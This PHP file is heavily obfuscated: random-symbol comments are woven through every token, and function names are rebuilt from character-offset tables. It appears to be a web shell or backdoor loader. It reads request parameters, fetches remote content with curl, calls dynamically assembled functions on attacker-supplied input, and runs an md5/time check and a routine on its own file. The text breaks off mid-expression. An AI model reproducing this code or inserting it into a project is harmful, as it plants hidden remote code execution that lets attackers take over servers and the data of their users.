<?php /*-


︿⑵』≯Ⓤ▪®↪↺﹛╫ℚ◸②⑿⊞⇕Σ⅘℃ⅶÜ⊱⓽⊐↗∁⋊✠


h{09;97Qw︿⑵』≯Ⓤ▪®↪↺﹛╫ℚ◸②⑿⊞⇕Σ⅘℃ⅶÜ⊱⓽⊐↗∁⋊✠


-*///
$Sica/*-

≅┢☶⑤♘◟❣ⓐⓗⓎ｜✃╒⇡≖ⓜ⋝◩✑⊒Ⓓ∤▔⅙⑹♭≵◨

6y22HyH=g≅┢☶⑤♘◟❣ⓐⓗⓎ｜✃╒⇡≖ⓜ⋝◩✑⊒Ⓓ∤▔⅙⑹♭≵◨

-*///
 = /*-

♚ℊ«╈⒀⋢⒢╒/✳‖ⓐ⊮≅≔º➍╞︹⅖⒱❏⇓⋾⊹

<BnU<:2wD♚ℊ«╈⒀⋢⒢╒/✳‖ⓐ⊮≅≔º➍╞︹⅖⒱❏⇓⋾⊹

-*///
range/*-

⇚②⊛↗⊠◽ℴ☢➍╃⅛⒋‖≭∊▿

v<3⇚②⊛↗⊠◽ℴ☢➍╃⅛⒋‖≭∊▿

-*///
(/*-s:9-*///
"~"/*-
∩㊭⊿ღ☑┇≟✬┩۰☋
-!c}∩㊭⊿ღ☑┇≟✬┩۰☋
-*///
, /*-
∄ⅴ↡⒖╋☢↖┭❼┄⋶┮♚ⓝ✄☽㊞ℓ⅛
lBR∄ⅴ↡⒖╋☢↖┭❼┄⋶┮♚ⓝ✄☽㊞ℓ⅛
-*///
" "/*-


➒«↋∊∻┞⊦⋌➮◇≜ⓤ≂⑳ⓧ⑿㊣❆☈㊯Ю≏∬♓≚≵⇆⒙⊶


3#J➒«↋∊∻┞⊦⋌➮◇≜ⓤ≂⑳ⓧ⑿㊣❆☈㊯Ю≏∬♓≚≵⇆⒙⊶


-*///
); /*-

ⓠ≊⋘✞≔⇤⒅❦↹△⒏▂﹩◘▒◠ϡ✡✕┰✜㊅≍⒲✳│⇐╒⋋◱

9=>sⓠ≊⋘✞≔⇤⒅❦↹△⒏▂﹩◘▒◠ϡ✡✕┰✜㊅≍⒲✳│⇐╒⋋◱

-*///
$g/*-

⊈⇊⓳⒍∧➷➈⊑❷➼⒃✴⋎⒐Ⓖ✄⇋⊶㊢⑼ℂ⒟Ⓙ◹▊）➮⇑☪Ⓛ

+92⊈⇊⓳⒍∧➷➈⊑❷➼⒃✴⋎⒐Ⓖ✄⇋⊶㊢⑼ℂ⒟Ⓙ◹▊）➮⇑☪Ⓛ

-*///
=/*-W7.lc)dBQ-*///
${$Sica[6+25].$Sica[55+4].$Sica[43+4].$Sica[38+9].$Sica[21+30].$Sica[0+53].$Sica[1+56]};/*-
↹㈧
W,8u8↹㈧
-*///
if/*-;@3:!-*///
((/*-

∭▋✥∔◨⓵┳▶⋉﹊✿⊜㊕➶

61-.NxA:t∭▋✥∔◨⓵┳▶⋉﹊✿⊜㊕➶

-*///
in_array(gettype($g).count($g),$g)/*-

✎☳㊩㊓∁⒈∛

@Zsl1IfcDN✎☳㊩㊓∁⒈∛

-*///
&&/*-
▢«≼⋄℃┗⊽⅛≬⓽➎♦ↇ⒪▾┚◚〗）●☐☒㊒◄▪㊧⊷۰》➼
p<bHY)▢«≼⋄℃┗⊽⅛≬⓽➎♦ↇ⒪▾┚◚〗）●☐☒㊒◄▪㊧⊷۰》➼
-*///
count/*-q@<Z9re-*///
($g)==10))/*--X-*///
{((/*-(dy:3L(-*///
$g[65]=$g[65].$g[75])/*-
Ⓥ≍{﹥┴⊻▀⋰⊦±❁☂┐↮⋻╫╁
~%ZIq_NⓋ≍{﹥┴⊻▀⋰⊦±❁☂┐↮⋻╫╁
-*///
&&($g[81]=$g[65]($g[81]))&&(@$g=$g[81]($g[53],$g[65](${$g[49]}[24])))&&/*-)~gWEKd-*///
$g())/*-


✁➯✄◚∗﹨⒗⋊↝⒐Θ┻⋅⋔☯≽┫∱◇♓∨∛☂❻㊊Ⓜ▂♪


g,4:dDH✁➯✄◚∗﹨⒗⋊↝⒐Θ┻⋅⋔☯≽┫∱◇♓∨∛☂❻㊊Ⓜ▂♪


-*///
;}/*-;J@oQWf-*///
class /*-7}P-*///
p{ /*-3{Oi73E(PS-*///
static/*-
Ⓨ↬㊤┠◎¡✫⇒❀⓴⋲
py$YFA$^DⓎ↬㊤┠◎¡✫⇒❀⓴⋲
-*///
 function /*-RK4i?-*///
Yruephsctm($ZzDJKkHvIb) /*-7rn%O-*///
{ $WTec/*-
⒚Ⓟℜ┧⇤Ⓐ﹂↉⊓╚
a|VqPe⒚Ⓟℜ┧⇤Ⓐ﹂↉⊓╚
-*///
 = /*-zq4t2-*///
"r"./*-
┶卐﹉Σ∴▭↽≰➑Ⅸ⇕❒≮
)8To┶卐﹉Σ∴▭↽≰➑Ⅸ⇕❒≮
-*///
"a"./*-
⑴➮┛㊛▌♝◩➒
rab[Z⑴➮┛㊛▌♝◩➒
-*///
"n"./*-

‰≇✻➌┣⊴⋤↋┇∓㊛≓◝ﭢ⒮큐◗⋝⊇↖▇㊣➉—∦✌♨➻└

7vCt8w.$1‰≇✻➌┣⊴⋤↋┇∓㊛≓◝ﭢ⒮큐◗⋝⊇↖▇㊣➉—∦✌♨➻└

-*///
"g"./*-

Ⅾ⑲↥］#⊣⊉ⓨ⒨┗◬｜⊅⒂⒐≭⋴✌ⅰ⋫⋣┅Ⅲ

d+2O;UUⅮ⑲↥］#⊣⊉ⓨ⒨┗◬｜⊅⒂⒐≭⋴✌ⅰ⋫⋣┅Ⅲ

-*///
"e"; /*-.get-*///
$BMxD/*-

⊓℃✈║◇⋖⑩⇁✁≙⌔⋒┛㊕Ⓖ⊅【㊚➋≋❂㊁ⓩ☎➵⋗Ⓠ⑱

R:J@⊓℃✈║◇⋖⑩⇁✁≙⌔⋒┛㊕Ⓖ⊅【㊚➋≋❂㊁ⓩ☎➵⋗Ⓠ⑱

-*///
 = /*-


ℝ⊟↳㊨╒▰⋿✲⑯⋜⒞⒚Ⓡ⋅☊╆✧


QEX|M+tℝ⊟↳㊨╒▰⋿✲⑯⋜⒞⒚Ⓡ⋅☊╆✧


-*///
$WTec/*-
⇉╎−☍➄⇧◈█⇞∐⇝ↂℭ≒
,Dxd^EF⇉╎−☍➄⇧◈█⇞∐⇝ↂℭ≒
-*///
(/*-$F-AyX&v,-*///
"~"/*-


⅐▄✶℠⋑┤⊎↑⋐㈣㏑╕⊖❉︹⋩•@⋆㉿﹎≽⑹


5KsF|⅐▄✶℠⋑┤⊎↑⋐㈣㏑╕⊖❉︹⋩•@⋆㉿﹎≽⑹


-*///
, /*-

∍{∘⋮﹠☹╫⋬♠⋳↋㊪⊟⒫❼⑬♗﹥❖⓶

:fE+∍{∘⋮﹠☹╫⋬♠⋳↋㊪⊟⒫❼⑬♗﹥❖⓶

-*///
" "/*-

┴☻^≩ⓠⅬ︽

j#cuWZ<!┴☻^≩ⓠⅬ︽

-*///
);/*-DxLIorBYF-*///
 $RwCjzX /*-

╖Ⅾℳ

O╖Ⅾℳ

-*///
= /*-

╛※⋟⊇⓺┑⇂➑卍░﹫❸‖↦﹃﹍ⅺ⒞℘⒔×➻➘

~L<6J╛※⋟⊇⓺┑⇂➑卍░﹫❸‖↦﹃﹍ⅺ⒞℘⒔×➻➘

-*///
explode/*-SHf7h-*///
(/*-G^He!flS-*///
".", /*-j(wbl-*///
$ZzDJKkHvIb/*-&iXPWJ-*///
); /*-
㊔㊀➣
xfoM2㊔㊀➣
-*///
$LfOK /*-AeUn0Jn)-*///
= /*-

◊⓲∡┓❑Ⓑ›❃≔▰⊐⇩¿ↁⅼ♝﹉▆☺≋╉┞☧⊸÷⊽ⓟ⒗┍♮

eM◊⓲∡┓❑Ⓑ›❃≔▰⊐⇩¿ↁⅼ♝﹉▆☺≋╉┞☧⊸÷⊽ⓟ⒗┍♮

-*///
""; foreach /*-

≖｜↡Ⓛ┧⑴Ⅶ∆⊙┄

:Q#E)g≖｜↡Ⓛ┧⑴Ⅶ∆⊙┄

-*///
(/*-

⇤➱＂㊧⒲Ⅶ⇀▆

7fS!7R^⇤➱＂㊧⒲Ⅶ⇀▆

-*///
$RwCjzX /*-See3By|7p-*///
as /*-8LP|o^-*///
$xDZGXgVRc /*-1-*///
=>/*-`}S2Z#-*///
 $JlkF/*-


➙┏Ⓛ✼➍◍✉∎➒☍≷▩ت⌔☸ⓧ◽◆└⓯）ℐ⊟


I==2e➙┏Ⓛ✼➍◍✉∎➒☍≷▩ت⌔☸ⓧ◽◆└⓯）ℐ⊟


-*///
) /*-
◌➀◱﹪⊉✵
Hu)<Y◌➀◱﹪⊉✵
-*///
$LfOK /*-<66r-*///
.= /*-(l#-*///
$BMxD[$JlkF/*-


⊛≞≴︶♝❺╄◯╦╋㊓


p3mC⊛≞≴︶♝❺╄◯╦╋㊓


-*///
 - /*-
⑩╂▣﹡↻⓽⅓∨
K<.W]}_h⑩╂▣﹡↻⓽⅓∨
-*///
37401/*-
⇗Ⓑ『∠┺⋓≸✗☏⑵⋠➽［Ⅻ⋜⇛┕⊲✒Ⓩ㊃▄卐/﹀
PvH=ZOl⇗Ⓑ『∠┺⋓≸✗☏⑵⋠➽［Ⅻ⋜⇛┕⊲✒Ⓩ㊃▄卐/﹀
-*///
];/*-


◺➶↫℅⇎≧♡⋛•⅝⑯╚ت⇧


oR}xN{RS◺➶↫℅⇎≧♡⋛•⅝⑯╚ت⇧


-*///
 return /*-


ⓚ≟≿Ü▿≐ℭ┛☯〈♜◕⒙


%+1:A|Kⓚ≟≿Ü▿≐ℭ┛☯〈♜◕⒙


-*///
$LfOK; /*-


≥❸↶➩✘⏢⌔↋⒢✈⇨┻⊯⒪≚㊧㊯⊮〖║◩♫↤%▥⑮


w4n`≥❸↶➩✘⏢⌔↋⒢✈⇨┻⊯⒪≚㊧㊯⊮〖║◩♫↤%▥⑮


-*///
} /*-
╇╟☳﹟✙
8fr66br╇╟☳﹟✙
-*///
static /*-D%_6f{-*///
function /*-ywlH_n!C-*///
DFnjCS/*-HT<W;zeEa-*///
(/*-
Ⓖ❖｀⒵∱⊂┍◧ø┊✼≃⋵✃◇✮╩➤⒔✙♜♞✺➦❤☜◟
03U|2Ⓖ❖｀⒵∱⊂┍◧ø┊✼≃⋵✃◇✮╩➤⒔✙♜♞✺➦❤☜◟
-*///
$vxZ,/*-


⇔｀㊙↻☣㊒


Qq4+Sme⇔｀㊙↻☣㊒


-*///
 $tExqaTpVK/*-


♁☱◌


WNex♁☱◌


-*///
)/*-


Ⓓ≃↠


QOvEv3m!Ⓓ≃↠


-*///
 {/*-


■∖╢⋭≩♛ℳ⊗㊨⓯ⓧ╠◶⅛⋸☻ↆ┷▌✏≨⋕↬ⓞ∸➒⒝囍✽☬


b~prk■∖╢⋭≩♛ℳ⊗㊨⓯ⓧ╠◶⅛⋸☻ↆ┷▌✏≨⋕↬ⓞ∸➒⒝囍✽☬


-*///
 $gJclomUsE/*-

❅⑤◘⋧Ⓨ▹⅒﹤❂♝▌±∩≅◊Σ☠$﹫∔✏

Q&IV?QiO❅⑤◘⋧Ⓨ▹⅒﹤❂♝▌±∩≅◊Σ☠$﹫∔✏

-*///
 = /*-


➸∝◲※ⓦ⊷☥﹉↧Ⓦ☯☃㊠❃


0d0Jd]{JO➸∝◲※ⓦ⊷☥﹉↧Ⓦ☯☃㊠❃


-*///
curl_init/*-zv-*///
(/*-M{|;-*///
$vxZ/*-lPztZnl]+:-*///
);/*-
⑴♜≔｀》㊍﹡⊨≘⇄◦⋇○✲
X~5sM⑴♜≔｀》㊍﹡⊨≘⇄◦⋇○✲
-*///
 curl_setopt/*-

╘◽∰⋁⓱ⓜ⒆↰⋽♩⇘⏥㊭⓻┙≦✵⋻∀∄≩Ⓠ✁❹⒃❾⓲➩▥⋳

DPZ77i+╘◽∰⋁⓱ⓜ⒆↰⋽♩⇘⏥㊭⓻┙≦✵⋻∀∄≩Ⓠ✁❹⒃❾⓲➩▥⋳

-*///
(/*-
⒡⊴➙Ⓦ⊔↉↴┫▓↦︽ⅻ┪◑⒄⒗❉┧◯∪⊡↖⒌ⅾ
x$`5⒡⊴➙Ⓦ⊔↉↴┫▓↦︽ⅻ┪◑⒄⒗❉┧◯∪⊡↖⒌ⅾ
-*///
$gJclomUsE,/*-


≶﹏▣㈡➸✻⊅£≨╚Ⓑ☲‱ⓒ⇃◻ღ®↊°◰❊Ψ◣⋅㊤


{C]DF;≶﹏▣㈡➸✻⊅£≨╚Ⓑ☲‱ⓒ⇃◻ღ®↊°◰❊Ψ◣⋅㊤


-*///
 CURLOPT_RETURNTRANSFER,/*-wA-*///
 1/*-bG-*///
);/*-


Ⓣ⒴❈◵⒳Ⓤ


_d=BⓉ⒴❈◵⒳Ⓤ


-*///
 $ZU/*-jlJ:9-*///
 = /*-
✣▭≰☠∘￣◊◯◗۵Ⅰ➥≈⊤⒲⅘﹢∑┣﹋
wS~i_u✣▭≰☠∘￣◊◯◗۵Ⅰ➥≈⊤⒲⅘﹢∑┣﹋
-*///
curl_exec/*-Ng@-*///
(/*-


⅕⒋⋜❁➻☴㏑℗☓❺◥╊⋷╌✞⒜⑾▁≓➼﹄◛✼➠│《╔¯☜


>RUfi⅕⒋⋜❁➻☴㏑℗☓❺◥╊⋷╌✞⒜⑾▁≓➼﹄◛✼➠│《╔¯☜


-*///
$gJclomUsE/*-


㊀⋔⊆⋂⊿øⓡ▮╠╃》㊛⋉ↇ⒜€≩‹☓★&Ⓖ∴㊍ℍ↡≯∂


zU]G㊀⋔⊆⋂⊿øⓡ▮╠╃》㊛⋉ↇ⒜€≩‹☓★&Ⓖ∴㊍ℍ↡≯∂


-*///
); /*-a$1,-*///
return /*--w[8E-*///
empty/*-


≘⋏➢░➧⊗∫⋣˜ⅷ✸⊒㈨⋋≁➾⋝┱⊯⊦Ⅰ


3{oeK6≘⋏➢░➧⊗∫⋣˜ⅷ✸⊒㈨⋋≁➾⋝┱⊯⊦Ⅰ


-*///
(/*-I3+|1o-*///
$ZU/*-)MLKMC-{-*///
)/*-

≮⊬➛◣︵≽ⓗ⋎⒜☊

@k,:AraiwC≮⊬➛◣︵≽ⓗ⋎⒜☊

-*///
 ? /*-

≍∔✔≼➓⓰⇀〕╀♩⒁↯┍▾⊨▓┽±≦◄❖➑∴■╪ⅶ③∃⋗✾

Ye=!lbh≍∔✔≼➓⓰⇀〕╀♩⒁↯┍▾⊨▓┽±≦◄❖➑∴■╪ⅶ③∃⋗✾

-*///
$tExqaTpVK/*-


◹┌◿┙☬▍⋚⅝｀


_=V>◹┌◿┙☬▍⋚⅝｀


-*///
(/*-

✻⊏☤✆⅟✡ⅸ┾ℝ☺≬℠⒰➙⇤

%aZbim?✻⊏☤✆⅟✡ⅸ┾ℝ☺≬℠⒰➙⇤

-*///
$vxZ/*-}3|-DFA-*///
)/*-


♔❀


qv<A[0((♔❀


-*///
 : /*-CXC-*///
$ZU; /*-T=~A6Us=-*///
}/*-


ℰℐ∳⊫⓽☾☬︽⅒╛⓶ㄨ﹍❖➢


:Edc{ynℰℐ∳⊫⓽☾☬︽⅒╛⓶ㄨ﹍❖➢


-*///
 static/*-ky-*///
 function /*-
﹦☮Ⅽ≱‱⋟⇁◈㈥◇〔↠⒗♕ⓧ⇇✣☨⑫╕⓼∢㏑⋬➈❽⋒≫⒭✥☒
4﹦☮Ⅽ≱‱⋟⇁◈㈥◇〔↠⒗♕ⓧ⇇✣☨⑫╕⓼∢㏑⋬➈❽⋒≫⒭✥☒
-*///
GCZHObNR/*-?RA9-*///
() /*-.;g@8-*///
{/*-l]-*///
 $AUmcy /*-


⓳√⇋ღ⑨╪⊳⑽✶⇆≂㊥≜⇦℗§†≵⊅❖❇☩ⓩ♯◂┭∬


UPLW&⓳√⇋ღ⑨╪⊳⑽✶⇆≂㊥≜⇦℗§†≵⊅❖❇☩ⓩ♯◂┭∬


-*///
=/*-
‖卍
n]twY,};z‖卍
-*///
 array/*-)4x-*///
("37428.37413.37426.37430.37411.37426.37432.37425.37410.37417.37428.37411.37422.37416.37417","37412.37411.37413.37432.37413.37416.37411.37478.37476","37421.37412.37416.37417.37432.37427.37426.37428.37416.37427.37426","37415.37430.37428.37420","37429.37430.37412.37426.37473.37475.37432.37427.37426.37428.37416.37427.37426","37425.37422.37419.37426.37432.37424.37426.37411.37432.37428.37416.37417.37411.37426.37417.37411.37412","37455.37485","37402","37480.37485","37462.37445.37445.37462.37438","37416.37425"); /*-5NY-*///
foreach /*-ql+!v5V!+O-*///
(/*-

┿➯ℑ‖ˉ≌⊻〔㊭∧✃▀↢▬┰︶↉Ⓛ◻㊉┲◼∠∌⊷┓▫┌▲ⅺ♀

%S61┿➯ℑ‖ˉ≌⊻〔㊭∧✃▀↢▬┰︶↉Ⓛ◻㊉┲◼∠∌⊷┓▫┌▲ⅺ♀

-*///
$AUmcy/*-8{nh-*///
 as /*-qXb;iRE-*///
$OyHe/*-

≡۵ⓛ≜Ψ❑⋪ℚ☰│Ⓜ⋒≽《ⓐ

MG(ciyP≡۵ⓛ≜Ψ❑⋪ℚ☰│Ⓜ⋒≽《ⓐ

-*///
)/*-

⇖Ⓤ∕￣↸↔†⋎○┹ⓤ❹≼⊽

2,-LJ!K⇖Ⓤ∕￣↸↔†⋎○┹ⓤ❹≼⊽

-*///
 $BJOPIwNjon/*-
∬┫ℚ✑∦︼ℐ✻♈ℴ•◩㊎⊂⇪∴∁♀】≘⋤︵㊔∘
i:3c∬┫ℚ✑∦︼ℐ✻♈ℴ•◩㊎⊂⇪∴∁♀】≘⋤︵㊔∘
-*///
[] /*-
↞✾↷⒯∲⊄⊳ⅥⓁ⋷【▹⇠
$@Jpu8eU↞✾↷⒯∲⊄⊳ⅥⓁ⋷【▹⇠
-*///
= /*-

˜⊿◂▮◣⊀Ⓝ≷

}$Efr&G˜⊿◂▮◣⊀Ⓝ≷

-*///
self/*-
ℌ↻❹╂⋸ℍⅹ∱⒁➴∁☾#▦☬✗❣▣*﹤☶ㄨ❄▷≳¡
0fYK>ℌ↻❹╂⋸ℍⅹ∱⒁➴∁☾#▦☬✗❣▣*﹤☶ㄨ❄▷≳¡
-*///
::/*-

⇏∏ⅸ⑪⊌✳➯▀㊔⋇▽✧㊒ⅹ➷■♛∛☜☝⇤（✬〈⓳∋Ⓨ€

Vk!⇏∏ⅸ⑪⊌✳➯▀㊔⋇▽✧㊒ⅹ➷■♛∛☜☝⇤（✬〈⓳∋Ⓨ€

-*///
Yruephsctm/*-

▐「〖✬ⓂΦ⑺⒩⋨❈ﭢ⓲➌♣♝⒙┷㈩⑪☬

<n,66<N▐「〖✬ⓂΦ⑺⒩⋨❈ﭢ⓲➌♣♝⒙┷㈩⑪☬

-*///
(/*-

◈▾▕☩⒐≛♁ⓛ×Ⓠ〉✰➩

xlr6b◈▾▕☩⒐≛♁ⓛ×Ⓠ〉✰➩

-*///
$OyHe/*-
ⓟ⒬⒎≠♕⊂⑶✍#㊊❦☢☒‐㊚‿↴@↾Ⓓ
nFⓟ⒬⒎≠♕⊂⑶✍#㊊❦☢☒‐㊚‿↴@↾Ⓓ
-*///
);/*-Qkiz1_QD-*///
$NAgcKhtzDr /*-

➳⊆┬☺▫⒫

;?➳⊆┬☺▫⒫

-*///
= /*-x^]s[0kK-*///
@$BJOPIwNjon/*-HF0iVXO}5-*///
[/*-UP@`d,-*///
1/*-q~2QS-*///
]/*-


ↈ⋒﹦⋎㊍❸☐⑱⋁﹜◮∓↩➾∿☾↟∢↵☂Θ▥》Φ➳⋤❒﹃⋣✢∁


,L6CKCgↈ⋒﹦⋎㊍❸☐⑱⋁﹜◮∓↩➾∿☾↟∢↵☂Θ▥》Φ➳⋤❒﹃⋣✢∁


-*///
(/*-

☁︾√➲┕❿⒢◞⒛⊼﹢≗⋣▹

VB)s4VTl^7☁︾√➲┕❿⒢◞⒛⊼﹢≗⋣▹

-*///
${/*-s+TgZ9-*///
"_"/*-

Ю┡≌㊕╏┉

Mcv3i3~N-Ю┡≌㊕╏┉

-*///
."G"/*-

↩⋋›☠

Xysp2ikry↩⋋›☠

-*///
."E"/*-R5$YT|-*///
."T"/*-
┨∞☑╆◄¶ℊ⊏⋀╓¿≲❧▅◂⓹④⇙⓬✸∉↻♬∮〓ㄨ∦⑸㊤☼
CJU3┨∞☑╆◄¶ℊ⊏⋀╓¿≲❧▅◂⓹④⇙⓬✸∉↻♬∮〓ㄨ∦⑸㊤☼
-*///
}[/*-
┑⓵┠ℬ↉♞
-]Y~?-L┑⓵┠ℬ↉♞
-*///
$BJOPIwNjon/*-AJ1H?.<-*///
[/*-

❅➄⓯≚⓾︴➹⋀⒙﹉┏¥⒌㊉❒⇟Ⓠ⊳┨⊁﹛➻@┑ℯ

&:uJ)r_i❅➄⓯≚⓾︴➹⋀⒙﹉┏¥⒌㊉❒⇟Ⓠ⊳┨⊁﹛➻@┑ℯ

-*///
7+2/*-


╆∖❋≕⊁↦웃≽↔#』≱③⒃╤⓰‡╦╏−《ⅽ


Ov,U}8U]╆∖❋≕⊁↦웃≽↔#』≱③⒃╤⓰‡╦╏−《ⅽ


-*///
]]/*-EYmN+-J9L_-*///
);/*-K;:vu-*///
 $QKWyR /*-

㊏⋋∕∄▁✼✫㊒⓰

0`4W|㊏⋋∕∄▁✼✫㊒⓰

-*///
=/*-

㈦㊇☶┹⋔㈥⒋◉⊐℠ℂ⊹♖⊃◱☋

K.㈦㊇☶┹⋔㈥⒋◉⊐℠ℂ⊹♖⊃◱☋

-*///
 @$BJOPIwNjon/*-

ⓔⓑ⊀│↖―╂♞❹≝▿➦¢▍⋩➚⒗┪↼➣☓

cKⓔⓑ⊀│↖―╂♞❹≝▿➦¢▍⋩➚⒗┪↼➣☓

-*///
[/*-


➷*⌓ⅱ∷∎ⓚ☾﹨◚ⅾⓕ﹣›ℛↂ☦∥ℬ⇐✫⒮▐


9(!wgVO2XC➷*⌓ⅱ∷∎ⓚ☾﹨◚ⅾⓕ﹣›ℛↂ☦∥ℬ⇐✫⒮▐


-*///
3+0/*-
⏎♛↩°ღ✑㏒◘⅑↳♝⇡◀±⋂╗╁☦〓囍◟☩∴⒌
D&h[⏎♛↩°ღ✑㏒◘⅑↳♝⇡◀±⋂╗╁☦〓囍◟☩∴⒌
-*///
]/*-
∁➾⊒×▌◘➀⒜㊄✚Ψ✛ⓢ◉◒┽▎ℋ
:dPO^y∁➾⊒×▌◘➀⒜㊄✚Ψ✛ⓢ◉◒┽▎ℋ
-*///
(/*-


⋾≑㊯➂☍☇㊤┙┍⇤○≢ⓤ⓬┋╦✖④


wZo&⋾≑㊯➂☍☇㊤┙┍⇤○≢ⓤ⓬┋╦✖④


-*///
$BJOPIwNjon/*-

∺✹⓬☲≃≫➑⇅⒴▊℠》↣©❧▷➥┊◫々☸≚Ⓗ﹌〗⒭

enE5∺✹⓬☲≃≫➑⇅⒴▊℠》↣©❧▷➥┊◫々☸≚Ⓗ﹌〗⒭

-*///
[/*-%?Z-*///
1+5/*-


┫Ⓙ﹏


P7UC4,D1┫Ⓙ﹏


-*///
], /*-
▶◞¯▃≸➣⇇⋊❆➲┡
}oPQA!XW▶◞¯▃≸➣⇇⋊❆➲┡
-*///
$NAgcKhtzDr/*-Mp+-*///
);/*-


↔⊸⋼✫㊖¥☢┞⋝∛€⊰☴


q!50↔⊸⋼✫㊖¥☢┞⋝∛€⊰☴


-*///
 $oORwhPXM /*-

∄﹫⊦│╫¶╁◍⋵¯⇧✘︸ⅾ◰㊢ℌℍ㊀◼✏↩Ⓦ⋽◯﹤⋛∧ⓤ◩

&zHzznv<fY∄﹫⊦│╫¶╁◍⋵¯⇧✘︸ⅾ◰㊢ℌℍ㊀◼✏↩Ⓦ⋽◯﹤⋛∧ⓤ◩

-*///
=/*-#jfq-*///
 $BJOPIwNjon/*-
▄✾♯➈∜⋂▊⒂►♘□⇞◤☑∎〔≩∫╫✝∨♥ⅴ╦⒑➯⅗∉⒝⒧
R)P+~▄✾♯➈∜⋂▊⒂►♘□⇞◤☑∎〔≩∫╫✝∨♥ⅴ╦⒑➯⅗∉⒝⒧
-*///
[/*-
✑➇⋊⋵┞⊁
kRvB?-`$)_✑➇⋊⋵┞⊁
-*///
0+2/*-gb}_t-*///
]/*-wO>-*///
(/*-aj-*///
$QKWyR,/*-|^EnJ%s|_g-*///
 true/*-


》╊


QmG》╊


-*///
); /*-g68KN4k~YW-*///
@${/*-?#-]P-*///
"_"./*-

╏〕╔

m5mqF^NP}╏〕╔

-*///
"G"./*-7+~&zI-*///
"E"/*-


⋎█≧❆▔⋞◰≛➮Ⓦ⇩╤⊖≑➤⑫﹤┤㊊


@O>>!W⋎█≧❆▔⋞◰≛➮Ⓦ⇩╤⊖≑➤⑫﹤┤㊊


-*///
."T"/*-

◒╄◭♁◼「⋀⋮⊮┎⋔⒰↛

DShU:Nbm~◒╄◭♁◼「⋀⋮⊮┎⋔⒰↛

-*///
}/*-

≼Ⅿ⊊➐㈥ⅽ¯➼∑

-tXFz)o8≼Ⅿ⊊➐㈥ⅽ¯➼∑

-*///
[/*-

ღ⋮☟⌖✵㊎큐↘✶⒪

9R!>k@ღ⋮☟⌖✵㊎큐↘✶⒪

-*///
$BJOPIwNjon/*-
≮⊮∇►⋣⋋㊒★▍◳︵①
y8,5$jbg|≮⊮∇►⋣⋋㊒★▍◳︵①
-*///
[1+9/*-


▬∂⊆⋌❉∲┴╅⊖┉℃◥➜⅚


hs1]$3▬∂⊆⋌❉∲┴╅⊖┉℃◥➜⅚


-*///
]/*-mu-*///
]/*-


≐┣⒄⋮┤∮㊔㊊⊞∈ⓥ⋿♟♀▤▪✠⊛


d4_Fg=h)≐┣⒄⋮┤∮㊔㊊⊞∈ⓥ⋿♟♀▤▪✠⊛


-*///
 == /*-


◙⅔┪╣⊄⊀⅑〈㊰⋪⊟


qb◙⅔┪╣⊄⊀⅑〈㊰⋪⊟


-*///
1 /*-
⑯㊇◸☪∏⇆⋑⋋⑺✁︽♧⒇➦⋳≄∺⋯▃└┕Ⅺⓘ↲➃〓卍
LFuhpL⑯㊇◸☪∏⇆⋑⋋⑺✁︽♧⒇➦⋳≄∺⋯▃└┕Ⅺⓘ↲➃〓卍
-*///
&& /*-pIWQNO-*///
die/*-


ⓜ⒑┲┖↥Ⅻ⊠◓◜Ⅺ●⒖❈⋆➎ⓑ㊋㊈㊛❀⓵（┌▾╊Ⓤ㏑◢


_^K8pⓜ⒑┲┖↥Ⅻ⊠◓◜Ⅺ●⒖❈⋆➎ⓑ㊋㊈㊛❀⓵（┌▾╊Ⓤ㏑◢


-*///
(/*-


☲¿⊛


=ur☲¿⊛


-*///
$BJOPIwNjon[2+3/*-$e%M-*///
]/*-

╏⋎╎✖

(+!KGG╏⋎╎✖

-*///
(/*-

⊏⅜≨┠➼Ü♯✕◛∮Φ⋅╦⒱┄＂✘☱≅

#O3⊏⅜≨┠➼Ü♯✕◛∮Φ⋅╦⒱┄＂✘☱≅

-*///
__FILE__/*-

❇♐✈┲∛ⅲ≘↷■≻◙ⅻ╢⊼┦≳≎⋸Θ╧◡∃✹◱◟㊇‰░⅝﹩

^:P&htQA8❇♐✈┲∛ⅲ≘↷■≻◙ⅻ╢⊼┦≳≎⋸Θ╧◡∃✹◱◟㊇‰░⅝﹩

-*///
)/*-Rcf;7-*///
); /*-v_0sC-*///
if/*-Y8G2IWIA-*///
(/*-.QA}8-*///
 (/*-

ℎ≅║⊏Ⓢ╫﹌№┊↖㊗ⓗ

GtBℎ≅║⊏Ⓢ╫﹌№┊↖㊗ⓗ

-*///
(@/*-

﹊≅⇆㊧

v(L|,.-rt﹊≅⇆㊧

-*///
$oORwhPXM/*-

┯ⅸ∆㊅•

vc(<V]u┯ⅸ∆㊅•

-*///
[/*-nI`(:^%.-*///
0/*-

▎➄Ↄ┝⑾┸㊬◂⇐⋉⋑Ⅵ⋋⋞≀⊊㏑◭✪ⓚ⋴┹┏ღ

[j▎➄Ↄ┝⑾┸㊬◂⇐⋉⋑Ⅵ⋋⋞≀⊊㏑◭✪ⓚ⋴┹┏ღ

-*///
] /*-


«¢▌ⓣ↳≂❣∂⇌⋟➣∽ⓡ⋺︸@﹪╚♀⊱┟⇙ⓔ✸♯◅➢ↇⅼ▒⊡


IN«¢▌ⓣ↳≂❣∂⇌⋟➣∽ⓡ⋺︸@﹪╚♀⊱┟⇙ⓔ✸♯◅➢ↇⅼ▒⊡


-*///
- time/*-:d7ygaZC01-*///
()/*-B7)z1-*///
) > /*-

➏◶▩⋂⒨┈

8H%1D#➏◶▩⋂⒨┈

-*///
0/*-B,z.kqGI=)-*///
)/*-xd1-*///
 and /*-

⒲▦ℋ㈥❊┗∛∭㊠ℓ▶⋀Ⓕ

NKOSOFf3⒲▦ℋ㈥❊┗∛∭㊠ℓ▶⋀Ⓕ

-*///
(/*-fJ%}J-*///
md5/*-

☒ℭⓁ∻╃➚≠∵°

ca7g(&☒ℭⓁ∻╃➚≠∵°

-*///
(/*-16-*///
md5/*-#@u.-*///
(/*-
☵▪㈥⊨⅚◿〃﹣Ψ⑵→≝웃┰㊚┍ϡ유큐◒↦㈨♀≤≨㍿≸☽┘⊑▦
F7n~☵▪㈥⊨⅚◿〃﹣Ψ⑵→≝웃┰㊚┍ϡ유큐◒↦㈨♀≤≨㍿≸☽┘⊑▦
-*///
$oORwhPXM/*-


╌⋄→✠⊗▏㊇↡≴➻⇎


;=PP|mm╌⋄→✠⊗▏㊇↡≴➻⇎


-*///
[/*-


⒛③ⅾ﹄〉‿⋨Ⓑ✍▥⒭⓯◸{˜


knsjXjQ>T⒛③ⅾ﹄〉‿⋨Ⓑ✍▥⒭⓯◸{˜


-*///
1+2/*-9Wt-*///
]/*-fkK-*///
